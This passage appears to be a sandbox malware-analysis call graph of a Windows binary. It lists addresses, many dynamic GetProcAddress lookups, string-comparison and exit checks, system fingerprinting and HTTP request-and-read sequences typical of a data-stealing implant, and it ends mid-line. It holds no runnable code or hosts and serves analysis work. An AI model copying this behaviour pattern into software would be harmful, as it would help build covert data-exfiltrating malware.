12813 732ca9 12812->12813 12814 7345c0 34 API calls 12813->12814 12815 732cc2 12814->12815 12816 7345c0 34 API calls 12815->12816 12817 732cdb 12816->12817 12818 7345c0 34 API calls 12817->12818 12819 732cf4 12818->12819 12820 7345c0 34 API calls 12819->12820 12821 732d0d 12820->12821 12822 7345c0 34 API calls 12821->12822 12823 732d26 12822->12823 12824 7345c0 34 API calls 12823->12824 12825 732d3f 12824->12825 12826 7345c0 34 API calls 12825->12826 12827 732d58 12826->12827 12828 7345c0 34 API calls 12827->12828 12829 732d71 12828->12829 12830 7345c0 34 API calls 12829->12830 12831 732d8a 12830->12831 12832 7345c0 34 API calls 12831->12832 12833 732da3 12832->12833 12834 7345c0 34 API calls 12833->12834 12835 732dbc 12834->12835 12836 7345c0 34 API calls 12835->12836 12837 732dd5 12836->12837 12838 7345c0 34 API calls 12837->12838 12839 732dee 12838->12839 12840 7345c0 34 API calls 12839->12840 12841 732e07 12840->12841 12842 7345c0 34 API calls 12841->12842 12843 732e20 12842->12843 12844 7345c0 34 API calls 12843->12844 12845 732e39 12844->12845 12846 7345c0 34 API calls 12845->12846 12847 732e52 12846->12847 12848 7345c0 34 API calls 12847->12848 12849 732e6b 12848->12849 12850 7345c0 34 API calls 12849->12850 12851 732e84 12850->12851 12852 7345c0 34 API calls 12851->12852 12853 732e9d 12852->12853 12854 7345c0 34 API calls 12853->12854 12855 732eb6 12854->12855 12856 7345c0 34 API calls 12855->12856 12857 732ecf 12856->12857 12858 7345c0 34 API calls 12857->12858 12859 732ee8 12858->12859 12860 7345c0 34 API calls 12859->12860 12861 732f01 12860->12861 12862 7345c0 34 API calls 12861->12862 12863 732f1a 12862->12863 12864 7345c0 34 API calls 12863->12864 12865 732f33 12864->12865 12866 7345c0 34 API calls 12865->12866 12867 732f4c 12866->12867 12868 7345c0 34 API calls 12867->12868 12869 732f65 12868->12869 12870 7345c0 34 API calls 12869->12870 12871 732f7e 12870->12871 12872 7345c0 34 API calls 12871->12872 12873 732f97 12872->12873 12874 7345c0 34 API calls 12873->12874 12875 732fb0 12874->12875 12876 7345c0 34 API calls 12875->12876 12877 732fc9 12876->12877 12878 7345c0 34 API calls 12877->12878 12879 732fe2 12878->12879 12880 7345c0 34 API calls 12879->12880 12881 732ffb 12880->12881 12882 7345c0 34 API calls 12881->12882 12883 733014 12882->12883 12884 7345c0 34 API calls 12883->12884 12885 73302d 12884->12885 12886 7345c0 34 API calls 12885->12886 12887 733046 12886->12887 12888 7345c0 34 API calls 12887->12888 12889 73305f 12888->12889 12890 7345c0 34 API calls 12889->12890 12891 733078 12890->12891 12892 7345c0 34 API calls 12891->12892 12893 733091 12892->12893 12894 7345c0 34 API calls 12893->12894 12895 7330aa 12894->12895 12896 7345c0 34 API calls 12895->12896 12897 7330c3 12896->12897 12898 7345c0 34 API calls 12897->12898 12899 7330dc 12898->12899 12900 7345c0 34 API calls 12899->12900 12901 7330f5 12900->12901 12902 7345c0 34 API calls 12901->12902 12903 73310e 12902->12903 12904 7345c0 34 API calls 12903->12904 12905 733127 12904->12905 12906 7345c0 34 API calls 12905->12906 12907 733140 12906->12907 12908 7345c0 34 API calls 12907->12908 12909 733159 12908->12909 12910 7345c0 34 API calls 12909->12910 12911 733172 12910->12911 12912 7345c0 34 API calls 12911->12912 12913 73318b 12912->12913 12914 7345c0 34 API calls 12913->12914 12915 7331a4 12914->12915 12916 7345c0 34 API calls 12915->12916 12917 7331bd 12916->12917 12918 7345c0 34 API calls 12917->12918 12919 7331d6 12918->12919 12920 7345c0 34 API calls 12919->12920 12921 7331ef 12920->12921 12922 7345c0 34 API calls 12921->12922 12923 733208 12922->12923 12924 7345c0 34 API calls 12923->12924 12925 733221 12924->12925 12926 7345c0 34 API calls 12925->12926 12927 73323a 12926->12927 12928 7345c0 34 API calls 12927->12928 12929 733253 12928->12929 12930 7345c0 34 API calls 12929->12930 12931 73326c 12930->12931 12932 7345c0 34 API calls 12931->12932 12933 733285 12932->12933 12934 7345c0 34 API calls 12933->12934 12935 73329e 12934->12935 12936 7345c0 34 API calls 12935->12936 12937 7332b7 12936->12937 12938 7345c0 34 API calls 12937->12938 12939 7332d0 12938->12939 12940 7345c0 34 API calls 12939->12940 12941 7332e9 12940->12941 12942 7345c0 34 API calls 12941->12942 12943 733302 12942->12943 12944 7345c0 34 API calls 12943->12944 12945 73331b 12944->12945 12946 7345c0 34 API calls 12945->12946 12947 733334 12946->12947 12948 7345c0 34 API calls 12947->12948 12949 73334d 12948->12949 12950 7345c0 34 API calls 12949->12950 12951 733366 12950->12951 12952 7345c0 34 API calls 12951->12952 12953 73337f 12952->12953 12954 7345c0 34 API calls 12953->12954 12955 733398 12954->12955 12956 7345c0 34 API calls 12955->12956 12957 7333b1 12956->12957 12958 7345c0 34 API calls 12957->12958 12959 7333ca 12958->12959 12960 7345c0 34 API calls 12959->12960 12961 7333e3 12960->12961 12962 7345c0 34 API calls 12961->12962 12963 7333fc 12962->12963 12964 7345c0 34 API calls 12963->12964 12965 733415 12964->12965 12966 7345c0 34 API calls 12965->12966 12967 73342e 12966->12967 12968 7345c0 34 API calls 12967->12968 12969 733447 12968->12969 12970 7345c0 34 API calls 12969->12970 12971 733460 12970->12971 12972 7345c0 34 API calls 12971->12972 12973 733479 12972->12973 12974 7345c0 34 API calls 12973->12974 12975 733492 12974->12975 12976 7345c0 34 API calls 12975->12976 12977 7334ab 12976->12977 12978 7345c0 34 API calls 12977->12978 12979 7334c4 12978->12979 12980 7345c0 34 API calls 12979->12980 12981 7334dd 12980->12981 12982 7345c0 34 API calls 12981->12982 12983 7334f6 12982->12983 12984 7345c0 34 API calls 12983->12984 12985 73350f 12984->12985 12986 7345c0 34 API calls 12985->12986 12987 733528 12986->12987 12988 7345c0 34 API calls 12987->12988 12989 733541 12988->12989 12990 7345c0 34 API calls 12989->12990 12991 73355a 12990->12991 12992 7345c0 34 API calls 12991->12992 12993 733573 12992->12993 12994 7345c0 34 API calls 12993->12994 12995 73358c 12994->12995 12996 7345c0 34 API calls 12995->12996 12997 7335a5 12996->12997 12998 7345c0 34 API calls 12997->12998 12999 7335be 12998->12999 13000 7345c0 34 API calls 12999->13000 13001 7335d7 13000->13001 13002 7345c0 34 API calls 13001->13002 13003 7335f0 13002->13003 13004 7345c0 34 API calls 13003->13004 13005 733609 13004->13005 13006 7345c0 34 API calls 13005->13006 13007 733622 13006->13007 13008 7345c0 34 API calls 13007->13008 13009 73363b 13008->13009 13010 7345c0 34 API calls 13009->13010 13011 733654 13010->13011 13012 7345c0 34 API calls 13011->13012 13013 73366d 13012->13013 13014 7345c0 34 API calls 13013->13014 13015 733686 13014->13015 13016 7345c0 34 API calls 13015->13016 13017 73369f 13016->13017 13018 7345c0 34 API calls 13017->13018 13019 7336b8 13018->13019 13020 7345c0 34 API calls 13019->13020 13021 7336d1 13020->13021 13022 7345c0 34 API calls 13021->13022 13023 7336ea 13022->13023 13024 7345c0 34 API calls 13023->13024 13025 733703 13024->13025 13026 7345c0 34 API calls 13025->13026 13027 73371c 13026->13027 13028 7345c0 34 API calls 13027->13028 13029 733735 13028->13029 13030 7345c0 34 API calls 13029->13030 13031 73374e 13030->13031 13032 7345c0 34 API calls 13031->13032 13033 733767 13032->13033 13034 7345c0 34 API calls 13033->13034 13035 733780 13034->13035 13036 7345c0 34 API calls 13035->13036 13037 733799 13036->13037 13038 7345c0 34 API calls 13037->13038 13039 7337b2 13038->13039 13040 7345c0 34 API calls 13039->13040 13041 7337cb 13040->13041 13042 7345c0 34 API calls 13041->13042 13043 7337e4 13042->13043 13044 7345c0 34 API calls 13043->13044 13045 7337fd 13044->13045 13046 7345c0 34 API calls 13045->13046 13047 733816 13046->13047 13048 7345c0 34 API calls 13047->13048 13049 73382f 13048->13049 13050 7345c0 34 API calls 13049->13050 13051 733848 13050->13051 13052 7345c0 34 API calls 13051->13052 13053 733861 13052->13053 13054 7345c0 34 API calls 13053->13054 13055 73387a 13054->13055 13056 7345c0 34 API calls 13055->13056 13057 733893 13056->13057 13058 7345c0 34 API calls 13057->13058 13059 7338ac 13058->13059 13060 7345c0 34 API calls 13059->13060 13061 7338c5 13060->13061 13062 7345c0 34 API calls 13061->13062 13063 7338de 13062->13063 13064 7345c0 34 API calls 13063->13064 13065 7338f7 13064->13065 13066 7345c0 34 API calls 13065->13066 13067 733910 13066->13067 13068 7345c0 34 API calls 13067->13068 13069 733929 13068->13069 13070 7345c0 34 API calls 13069->13070 13071 733942 13070->13071 13072 7345c0 34 API calls 13071->13072 13073 73395b 13072->13073 13074 7345c0 34 API calls 13073->13074 13075 733974 13074->13075 13076 7345c0 34 API calls 13075->13076 13077 73398d 13076->13077 13078 7345c0 34 API calls 13077->13078 13079 7339a6 13078->13079 13080 7345c0 34 API calls 13079->13080 13081 7339bf 13080->13081 13082 7345c0 34 API calls 13081->13082 13083 7339d8 13082->13083 13084 7345c0 34 API calls 13083->13084 13085 7339f1 13084->13085 13086 7345c0 34 API calls 13085->13086 13087 733a0a 13086->13087 13088 7345c0 34 API calls 13087->13088 13089 733a23 13088->13089 13090 7345c0 34 API calls 13089->13090 13091 733a3c 13090->13091 13092 7345c0 34 API calls 13091->13092 13093 733a55 13092->13093 13094 7345c0 34 API calls 13093->13094 13095 733a6e 13094->13095 13096 7345c0 34 API calls 13095->13096 13097 733a87 13096->13097 13098 7345c0 34 API calls 13097->13098 13099 733aa0 13098->13099 13100 7345c0 34 API calls 13099->13100 13101 733ab9 13100->13101 13102 7345c0 34 API calls 13101->13102 13103 733ad2 13102->13103 13104 7345c0 34 API calls 13103->13104 13105 733aeb 13104->13105 13106 7345c0 34 API calls 13105->13106 13107 733b04 13106->13107 13108 7345c0 34 API calls 13107->13108 13109 733b1d 13108->13109 13110 7345c0 34 API calls 13109->13110 13111 733b36 13110->13111 13112 7345c0 34 API calls 13111->13112 13113 733b4f 13112->13113 13114 7345c0 34 API calls 13113->13114 13115 733b68 13114->13115 13116 7345c0 34 API calls 13115->13116 13117 733b81 13116->13117 13118 7345c0 34 API calls 13117->13118 13119 733b9a 13118->13119 13120 7345c0 34 API calls 13119->13120 13121 733bb3 13120->13121 13122 7345c0 34 API calls 13121->13122 13123 733bcc 13122->13123 13124 7345c0 34 API calls 13123->13124 13125 733be5 13124->13125 13126 7345c0 34 API calls 13125->13126 13127 733bfe 13126->13127 13128 7345c0 34 API calls 13127->13128 13129 733c17 13128->13129 13130 7345c0 34 API calls 13129->13130 13131 733c30 13130->13131 13132 7345c0 34 API calls 13131->13132 13133 733c49 13132->13133 13134 7345c0 34 API calls 13133->13134 13135 733c62 13134->13135 13136 7345c0 34 API calls 13135->13136 13137 733c7b 13136->13137 13138 7345c0 34 API calls 13137->13138 13139 733c94 13138->13139 13140 7345c0 34 API calls 13139->13140 13141 733cad 13140->13141 13142 7345c0 34 API calls 13141->13142 13143 733cc6 13142->13143 13144 7345c0 34 API calls 13143->13144 13145 733cdf 13144->13145 13146 7345c0 34 API calls 13145->13146 13147 733cf8 13146->13147 13148 7345c0 34 API calls 13147->13148 13149 733d11 13148->13149 13150 7345c0 34 API calls 13149->13150 13151 733d2a 13150->13151 13152 7345c0 34 API calls 13151->13152 13153 733d43 13152->13153 13154 7345c0 34 API calls 13153->13154 13155 733d5c 13154->13155 13156 7345c0 34 API calls 13155->13156 13157 733d75 13156->13157 13158 7345c0 34 API calls 13157->13158 13159 733d8e 13158->13159 13160 7345c0 34 API calls 13159->13160 13161 733da7 13160->13161 13162 7345c0 34 API calls 13161->13162 13163 733dc0 13162->13163 13164 7345c0 34 API calls 13163->13164 13165 733dd9 13164->13165 13166 7345c0 34 API calls 13165->13166 13167 733df2 13166->13167 13168 7345c0 34 API calls 13167->13168 13169 733e0b 13168->13169 13170 7345c0 34 API calls 13169->13170 13171 733e24 13170->13171 13172 7345c0 34 API calls 13171->13172 13173 733e3d 13172->13173 13174 7345c0 34 API calls 13173->13174 13175 733e56 13174->13175 13176 7345c0 34 API calls 13175->13176 13177 733e6f 13176->13177 13178 7345c0 34 API calls 13177->13178 13179 733e88 13178->13179 13180 7345c0 34 API calls 13179->13180 13181 733ea1 13180->13181 13182 7345c0 34 API calls 13181->13182 13183 733eba 13182->13183 13184 7345c0 34 API calls 13183->13184 13185 733ed3 13184->13185 13186 7345c0 34 API calls 13185->13186 13187 733eec 13186->13187 13188 7345c0 34 API calls 13187->13188 13189 733f05 13188->13189 13190 7345c0 34 API calls 13189->13190 13191 733f1e 13190->13191 13192 7345c0 34 API calls 13191->13192 13193 733f37 13192->13193 13194 7345c0 34 API calls 13193->13194 13195 733f50 13194->13195 13196 7345c0 34 API calls 13195->13196 13197 733f69 13196->13197 13198 7345c0 34 API calls 13197->13198 13199 733f82 13198->13199 13200 7345c0 34 API calls 13199->13200 13201 733f9b 13200->13201 13202 7345c0 34 API calls 13201->13202 13203 733fb4 13202->13203 13204 7345c0 34 API calls 13203->13204 13205 733fcd 13204->13205 13206 7345c0 34 API calls 13205->13206 13207 733fe6 13206->13207 13208 7345c0 34 API calls 13207->13208 13209 733fff 13208->13209 13210 7345c0 34 API calls 13209->13210 13211 734018 13210->13211 13212 7345c0 34 API calls 13211->13212 13213 734031 13212->13213 13214 7345c0 34 API calls 13213->13214 13215 73404a 13214->13215 13216 7345c0 34 API calls 13215->13216 13217 734063 13216->13217 13218 7345c0 34 API calls 13217->13218 13219 73407c 13218->13219 13220 7345c0 34 API calls 13219->13220 13221 734095 13220->13221 13222 7345c0 34 API calls 13221->13222 13223 7340ae 13222->13223 13224 7345c0 34 API calls 13223->13224 13225 7340c7 13224->13225 13226 7345c0 34 API calls 13225->13226 13227 7340e0 13226->13227 13228 7345c0 34 API calls 13227->13228 13229 7340f9 13228->13229 13230 7345c0 34 API calls 13229->13230 13231 734112 13230->13231 13232 7345c0 34 API calls 13231->13232 13233 73412b 13232->13233 13234 7345c0 34 API calls 13233->13234 13235 734144 13234->13235 13236 7345c0 34 API calls 13235->13236 13237 73415d 13236->13237 13238 7345c0 34 API calls 13237->13238 13239 734176 13238->13239 13240 7345c0 34 API calls 13239->13240 13241 73418f 13240->13241 13242 7345c0 34 API calls 13241->13242 13243 7341a8 13242->13243 13244 7345c0 34 API calls 13243->13244 13245 7341c1 13244->13245 13246 7345c0 34 API calls 13245->13246 13247 7341da 13246->13247 13248 7345c0 34 API calls 13247->13248 13249 7341f3 13248->13249 13250 7345c0 34 API calls 13249->13250 13251 73420c 13250->13251 13252 7345c0 34 API calls 13251->13252 13253 734225 13252->13253 13254 7345c0 34 API calls 13253->13254 13255 73423e 13254->13255 13256 7345c0 34 API calls 13255->13256 13257 734257 13256->13257 13258 7345c0 34 API calls 13257->13258 13259 734270 13258->13259 13260 7345c0 34 API calls 13259->13260 13261 734289 13260->13261 13262 7345c0 34 API calls 13261->13262 13263 7342a2 13262->13263 13264 7345c0 34 API calls 13263->13264 13265 7342bb 13264->13265 13266 7345c0 34 API calls 13265->13266 13267 7342d4 13266->13267 13268 7345c0 34 API calls 13267->13268 13269 7342ed 13268->13269 13270 7345c0 34 API calls 13269->13270 13271 734306 13270->13271 13272 7345c0 34 API calls 13271->13272 13273 73431f 13272->13273 13274 7345c0 34 API calls 13273->13274 13275 734338 13274->13275 13276 7345c0 34 API calls 13275->13276 13277 734351 13276->13277 13278 7345c0 34 API calls 13277->13278 13279 73436a 13278->13279 13280 7345c0 34 API calls 13279->13280 13281 734383 13280->13281 13282 7345c0 34 API calls 13281->13282 13283 73439c 13282->13283 13284 7345c0 34 API calls 13283->13284 13285 7343b5 13284->13285 13286 7345c0 34 API calls 13285->13286 13287 7343ce 13286->13287 13288 7345c0 34 API calls 13287->13288 13289 7343e7 13288->13289 13290 7345c0 34 API calls 13289->13290 13291 734400 13290->13291 13292 7345c0 34 API calls 13291->13292 13293 734419 13292->13293 13294 7345c0 34 API calls 13293->13294 13295 734432 13294->13295 13296 7345c0 34 API calls 13295->13296 13297 73444b 13296->13297 13298 7345c0 34 API calls 13297->13298 13299 734464 13298->13299 13300 7345c0 34 API calls 13299->13300 13301 73447d 13300->13301 13302 7345c0 34 API calls 13301->13302 13303 734496 13302->13303 13304 7345c0 34 API calls 13303->13304 13305 7344af 13304->13305 13306 7345c0 34 API calls 13305->13306 13307 7344c8 13306->13307 13308 7345c0 34 API calls 13307->13308 13309 7344e1 13308->13309 13310 7345c0 34 API calls 13309->13310 13311 7344fa 13310->13311 13312 7345c0 34 API calls 13311->13312 13313 734513 13312->13313 13314 7345c0 34 API calls 13313->13314 13315 73452c 13314->13315 13316 7345c0 34 API calls 13315->13316 13317 734545 13316->13317 13318 7345c0 34 API calls 13317->13318 13319 73455e 13318->13319 13320 7345c0 34 API calls 13319->13320 13321 734577 13320->13321 13322 7345c0 34 API calls 13321->13322 13323 734590 13322->13323 13324 7345c0 34 API calls 13323->13324 13325 7345a9 13324->13325 13326 749c10 13325->13326 13327 74a036 8 API calls 13326->13327 13328 749c20 43 API calls 13326->13328 13329 74a146 13327->13329 13330 74a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13327->13330 13328->13327 13331 74a216 13329->13331 13332 74a153 8 API calls 13329->13332 13330->13329 13333 74a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13331->13333 13334 74a298 13331->13334 13332->13331 13333->13334 13335 74a2a5 6 API calls 13334->13335 13336 74a337 13334->13336 13335->13336 13337 74a344 9 API calls 13336->13337 13338 74a41f 13336->13338 13337->13338 13339 74a4a2 13338->13339 13340 74a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13338->13340 13341 74a4dc 13339->13341 13342 74a4ab GetProcAddress GetProcAddress 13339->13342 13340->13339 13343 74a515 13341->13343 13344 74a4e5 GetProcAddress GetProcAddress 13341->13344 13342->13341 13345 74a612 13343->13345 13346 74a522 10 API calls 13343->13346 13344->13343 13347 74a67d 13345->13347 13348 74a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13345->13348 13346->13345 13349 74a686 GetProcAddress 13347->13349 13350 74a69e 13347->13350 13348->13347 13349->13350 13351 74a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13350->13351 13352 745ca3 13350->13352 13351->13352 13353 731590 13352->13353 14497 731670 13353->14497 13356 74a7a0 lstrcpy 13357 7315b5 13356->13357 13358 74a7a0 lstrcpy 13357->13358 13359 7315c7 13358->13359 13360 74a7a0 lstrcpy 13359->13360 13361 7315d9 13360->13361 13362 74a7a0 lstrcpy 13361->13362 13363 731663 13362->13363 13364 745510 13363->13364 13365 745521 13364->13365 13366 74a820 2 API calls 13365->13366 13367 74552e 13366->13367 13368 74a820 2 API calls 13367->13368 13369 74553b 13368->13369 13370 74a820 2 API calls 13369->13370 13371 745548 13370->13371 13372 74a740 lstrcpy 13371->13372 13373 745555 13372->13373 13374 74a740 lstrcpy 13373->13374 13375 745562 13374->13375 13376 74a740 lstrcpy 13375->13376 13377 74556f 13376->13377 13378 74a740 lstrcpy 13377->13378 13415 74557c 13378->13415 13379 74a740 lstrcpy 13379->13415 13380 74a7a0 lstrcpy 13380->13415 13381 745643 StrCmpCA 13381->13415 13382 7456a0 StrCmpCA 13383 7457dc 13382->13383 13382->13415 13384 74a8a0 lstrcpy 13383->13384 13385 7457e8 13384->13385 13386 74a820 2 API calls 13385->13386 13388 7457f6 13386->13388 13387 74a820 lstrlenA lstrcpy 13387->13415 13390 74a820 2 API calls 13388->13390 13389 745856 StrCmpCA 13391 745991 13389->13391 13389->13415 13392 745805 13390->13392 13393 74a8a0 lstrcpy 13391->13393 13395 731670 lstrcpy 13392->13395 13394 74599d 13393->13394 13397 74a820 2 API calls 13394->13397 13418 745811 13395->13418 13396 731590 lstrcpy 13396->13415 13398 7459ab 13397->13398 13401 74a820 2 API calls 13398->13401 13399 745a0b StrCmpCA 13402 745a16 Sleep 13399->13402 13403 745a28 13399->13403 13400 7452c0 29 API calls 13400->13415 13404 7459ba 13401->13404 13402->13415 13405 74a8a0 lstrcpy 13403->13405 13407 731670 lstrcpy 13404->13407 13408 745a34 13405->13408 13406 74a8a0 lstrcpy 13406->13415 13407->13418 13409 74a820 2 API calls 13408->13409 13410 745a43 13409->13410 13411 74a820 2 API calls 13410->13411 13413 745a52 13411->13413 13412 74578a StrCmpCA 13412->13415 13414 731670 lstrcpy 13413->13414 13414->13418 13415->13379 13415->13380 13415->13381 13415->13382 13415->13387 13415->13389 13415->13396 13415->13399 13415->13400 13415->13406 13415->13412 13416 74593f StrCmpCA 13415->13416 13417 7451f0 23 API calls 13415->13417 13416->13415 13417->13415 13418->12472 13420 747553 GetVolumeInformationA 13419->13420 13421 74754c 13419->13421 13422 747591 13420->13422 13421->13420 13423 7475fc GetProcessHeap HeapAlloc 13422->13423 13424 747628 wsprintfA 13423->13424 13425 747619 13423->13425 13427 74a740 lstrcpy 13424->13427 13426 74a740 lstrcpy 13425->13426 13428 745da7 13426->13428 13427->13428 13428->12493 13430 74a7a0 lstrcpy 13429->13430 13431 734899 13430->13431 14506 7347b0 13431->14506 13433 7348a5 13434 74a740 lstrcpy 13433->13434 13435 7348d7 13434->13435 13436 74a740 lstrcpy 13435->13436 13437 7348e4 13436->13437 13438 74a740 lstrcpy 13437->13438 13439 7348f1 13438->13439 13440 74a740 lstrcpy 13439->13440 13441 7348fe 13440->13441 13442 74a740 lstrcpy 13441->13442 13443 73490b InternetOpenA StrCmpCA 13442->13443 13444 734944 13443->13444 13445 734955 13444->13445 13446 734ecb InternetCloseHandle 13444->13446 14519 748b60 13445->14519 13448 734ee8 13446->13448 14514 739ac0 CryptStringToBinaryA 13448->14514 13449 734963 14527 74a920 13449->14527 13452 734976 13454 74a8a0 lstrcpy 13452->13454 13459 73497f 13454->13459 13455 74a820 2 API calls 13456 734f05 13455->13456 13458 74a9b0 4 API calls 13456->13458 13457 734f27 ctype 13461 74a7a0 lstrcpy 13457->13461 13460 734f1b 13458->13460 13463 74a9b0 4 API calls 13459->13463 13462 74a8a0 lstrcpy 13460->13462 13474 734f57 13461->13474 13462->13457 13464 7349a9 13463->13464 13465 74a8a0 lstrcpy 13464->13465 13466 7349b2 13465->13466 13467 74a9b0 4 API calls 13466->13467 13468 7349d1 13467->13468 13469 74a8a0 lstrcpy 13468->13469 13470 7349da 13469->13470 13471 74a920 3 API calls 13470->13471 13472 7349f8 13471->13472 13473 74a8a0 lstrcpy 13472->13473 13475 734a01 13473->13475 13474->12496 13476 74a9b0 4 API calls 13475->13476 13477 734a20 13476->13477 13478 74a8a0 lstrcpy 13477->13478 13479 734a29 13478->13479 13480 74a9b0 4 API calls 13479->13480 13481 734a48 13480->13481 13482 74a8a0 lstrcpy 13481->13482 13483 734a51 13482->13483 13484 74a9b0 4 API calls 13483->13484 13485 734a7d 13484->13485 13486 74a920 3 API calls 13485->13486 13487 734a84 13486->13487 13488 74a8a0 lstrcpy 13487->13488 13489 734a8d 13488->13489 13490 734aa3 InternetConnectA 13489->13490 13490->13446 13491 734ad3 HttpOpenRequestA 13490->13491 13493 734b28 13491->13493 13494 734ebe InternetCloseHandle 13491->13494 13495 74a9b0 4 API calls 13493->13495 13494->13446 13496 734b3c 13495->13496 13497 74a8a0 lstrcpy 13496->13497 13498 734b45 13497->13498 13499 74a920 3 API calls 13498->13499 13500 734b63 13499->13500 13501 74a8a0 lstrcpy 13500->13501 13502 734b6c 13501->13502 13503 74a9b0 4 API calls 13502->13503 13504 734b8b 13503->13504 13505 74a8a0 lstrcpy 13504->13505 13506 734b94 13505->13506 13507 74a9b0 4 API calls 13506->13507 13508 734bb5 13507->13508 13509 74a8a0 lstrcpy 13508->13509 13510 734bbe 13509->13510 13511 74a9b0 4 API calls 13510->13511 13512 734bde 13511->13512 13513 74a8a0 lstrcpy 13512->13513 13514 734be7 13513->13514 13515 74a9b0 4 API calls 13514->13515 13516 734c06 13515->13516 13517 74a8a0 lstrcpy 13516->13517 13518 734c0f 13517->13518 13519 74a920 3 API calls 13518->13519 13520 734c2d 13519->13520 13521 74a8a0 lstrcpy 13520->13521 13522 734c36 13521->13522 13523 74a9b0 4 API calls 13522->13523 13524 734c55 13523->13524 13525 74a8a0 lstrcpy 13524->13525 13526 734c5e 13525->13526 13527 74a9b0 4 API calls 13526->13527 13528 734c7d 13527->13528 13529 74a8a0 lstrcpy 13528->13529 13530 734c86 13529->13530 13531 74a920 3 API calls 13530->13531 13532 734ca4 13531->13532 13533 74a8a0 lstrcpy 13532->13533 13534 734cad 13533->13534 13535 74a9b0 4 API calls 13534->13535 13536 734ccc 13535->13536 13537 74a8a0 lstrcpy 13536->13537 13538 734cd5 13537->13538 13539 74a9b0 4 API calls 13538->13539 13540 734cf6 13539->13540 13541 74a8a0 lstrcpy 13540->13541 13542 734cff 13541->13542 13543 74a9b0 4 API calls 13542->13543 13544 734d1f 13543->13544 13545 74a8a0 lstrcpy 13544->13545 13546 734d28 13545->13546 13547 74a9b0 4 API calls 13546->13547 13548 734d47 13547->13548 13549 74a8a0 lstrcpy 13548->13549 13550 734d50 13549->13550 13551 74a920 3 API calls 13550->13551 13552 734d6e 13551->13552 13553 74a8a0 lstrcpy 13552->13553 13554 734d77 13553->13554 13555 74a740 lstrcpy 13554->13555 13556 734d92 13555->13556 13557 74a920 3 API calls 13556->13557 13558 734db3 13557->13558 13559 74a920 3 API calls 13558->13559 13560 734dba 13559->13560 13561 74a8a0 lstrcpy 13560->13561 13562 734dc6 13561->13562 13563 734de7 lstrlenA 13562->13563 13564 734dfa 13563->13564 13565 734e03 lstrlenA 13564->13565 14533 74aad0 13565->14533 13567 734e13 HttpSendRequestA 13568 734e32 InternetReadFile 13567->13568 13569 734e67 InternetCloseHandle 13568->13569 13574 734e5e 13568->13574 13571 74a800 13569->13571 13571->13494 13572 74a9b0 4 API calls 13572->13574 13573 74a8a0 lstrcpy 13573->13574 13574->13568 13574->13569 13574->13572 13574->13573 14538 74aad0 13575->14538 13577 7417c4 StrCmpCA 13578 7417d7 13577->13578 13579 7417cf ExitProcess 13577->13579 13580 7417e7 strtok_s 13578->13580 13582 7417f4 13580->13582 13581 7419c2 13581->12498 13582->13581 13583 74199e strtok_s 13582->13583 13584 741970 StrCmpCA 13582->13584 13585 7418f1 StrCmpCA 13582->13585 13586 741951 StrCmpCA 13582->13586 13587 741932 StrCmpCA 13582->13587 13588 741913 StrCmpCA 13582->13588 13589 74185d StrCmpCA 13582->13589 13590 74187f StrCmpCA 13582->13590 13591 7418ad StrCmpCA 13582->13591 13592 7418cf StrCmpCA 13582->13592 13593 74a820 lstrlenA lstrcpy 13582->13593 13594 74a820 2 API calls 13582->13594 13583->13582 13584->13582 13585->13582 13586->13582 13587->13582 13588->13582 13589->13582 13590->13582 13591->13582 13592->13582 13593->13582 13594->13583 13596 74a7a0 lstrcpy 13595->13596 13597 735979 13596->13597 13598 7347b0 5 API calls 13597->13598 13599 735985 13598->13599 13600 74a740 lstrcpy 13599->13600 13601 7359ba 13600->13601 13602 74a740 lstrcpy 13601->13602 13603 7359c7 13602->13603 13604 74a740 lstrcpy 13603->13604 13605 7359d4 13604->13605 13606 74a740 lstrcpy 13605->13606 13607 7359e1 13606->13607 13608 74a740 lstrcpy 13607->13608 13609 7359ee InternetOpenA StrCmpCA 13608->13609 13610 735a1d 13609->13610 13611 735fc3 InternetCloseHandle 13610->13611 13613 748b60 3 API calls 13610->13613 13612 735fe0 13611->13612 13615 739ac0 4 API calls 13612->13615 13614 735a3c 13613->13614 13616 74a920 3 API calls 13614->13616 13617 735fe6 13615->13617 13618 735a4f 13616->13618 13620 74a820 2 API calls 13617->13620 13622 73601f ctype 13617->13622 13619 74a8a0 lstrcpy 13618->13619 13625 735a58 13619->13625 13621 735ffd 13620->13621 13623 74a9b0 4 API calls 13621->13623 13627 74a7a0 lstrcpy 13622->13627 13624 736013 13623->13624 13626 74a8a0 lstrcpy 13624->13626 13628 74a9b0 4 API calls 13625->13628 13626->13622 13636 73604f 13627->13636 13629 735a82 13628->13629 13630 74a8a0 lstrcpy 13629->13630 13631 735a8b 13630->13631 13632 74a9b0 4 API calls 13631->13632 13633 735aaa 13632->13633 13634 74a8a0 lstrcpy 13633->13634 13635 735ab3 13634->13635 13637 74a920 3 API calls 13635->13637 13636->12504 13638 735ad1 13637->13638 13639 74a8a0 lstrcpy 13638->13639 13640 735ada 13639->13640 13641 74a9b0 4 API calls 13640->13641 13642 735af9 13641->13642 13643 74a8a0 lstrcpy 13642->13643 13644 735b02 13643->13644 13645 74a9b0 4 API calls 13644->13645 13646 735b21 13645->13646 13647 74a8a0 lstrcpy 13646->13647 13648 735b2a 13647->13648 13649 74a9b0 4 API calls 13648->13649 13650 735b56 13649->13650 13651 74a920 3 API calls 13650->13651 13652 735b5d 13651->13652 13653 74a8a0 lstrcpy 13652->13653 13654 735b66 13653->13654 13655 735b7c InternetConnectA 13654->13655 13655->13611 13656 735bac HttpOpenRequestA 13655->13656 13658 735fb6 InternetCloseHandle 13656->13658 13659 735c0b 13656->13659 13658->13611 13660 74a9b0 4 API calls 13659->13660 13661 735c1f 13660->13661 13662 74a8a0 lstrcpy 13661->13662 13663 735c28 13662->13663 13664 74a920 3 API calls 13663->13664 13665 735c46 13664->13665 13666 74a8a0 lstrcpy 13665->13666 13667 735c4f 13666->13667 13668 74a9b0 4 API calls 13667->13668 13669 735c6e 13668->13669 13670 74a8a0 lstrcpy 13669->13670 13671 735c77 13670->13671 13672 74a9b0 4 API calls 13671->13672 13673 735c98 13672->13673 13674 74a8a0 lstrcpy 13673->13674 13675 735ca1 13674->13675 13676 74a9b0 4 API calls 13675->13676 13677 735cc1 13676->13677 13678 74a8a0 lstrcpy 13677->13678 13679 735cca 13678->13679 13680 74a9b0 4 API calls 13679->13680 13681 